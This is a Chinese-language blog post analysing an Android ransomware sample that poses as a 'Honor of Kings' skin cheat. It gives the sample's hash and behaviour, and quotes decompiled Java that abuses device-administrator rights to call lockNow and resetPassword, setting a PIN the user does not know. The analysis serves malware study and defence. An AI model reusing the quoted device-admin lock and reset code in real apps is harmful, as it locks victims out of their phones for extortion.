Android病毒樣本分析(3)
阿新 • • 發佈:2019-01-28
1.基本資訊
病毒名稱: com.android.getbest-1
檔名稱: 王者榮耀刷面板
檔案MD5: 4FF98D2A5F045921757B73FAA1D6012D
檔案包名: com.android.getbest
危害屬性: 惡意鎖屏、勒索2.基本行為
該程式是一款假借王者榮耀外掛名號的病毒軟體,程式啟動後隱藏自身圖示,誘騙使用者啟用裝置管理器保護自身以免被解除安裝,之後實現鎖屏操作,並且關機無效
3.詳細分析
1、程式入口函式內啟動了一個活動
2、活動內,利用裝置管理器設定解鎖PIN碼,通過誘導使用者啟用裝置管理器,勒索軟體會在使用者未知情的情況下強制給手機設定一個解鎖PIN碼,導致使用者無法解鎖手機。try { Class localClass = Class.forName("com.android.getbest.MyAdmin"); this.componentName = new ComponentName(this, localClass); this.isAdminActive = this.dpm.isAdminActive(this.componentName); return; }
setContentView(2130903040); ((Button)findViewById(2131165185)).setText((CharSequence)jiemi.decrypt("A83B614B5AD4F25664AE7C3E62837B8B", "huawei")); this.dpm = ((DevicePolicyManager)getSystemService("device_policy")); //獲取許可權 checkAdmin(); //修改解鎖PIN碼 paramBundle = new Intent();
@Override public void onEnabled(Context paramContext, Intent paramIntent) { String str = paramContext.getSharedPreferences("test", 0).getString("test", String.valueOf(6699)); //解鎖碼 getManager(paramContext).lockNow(); getManager(paramContext).resetPassword(str, 0); super.onEnabled(paramContext, paramIntent); }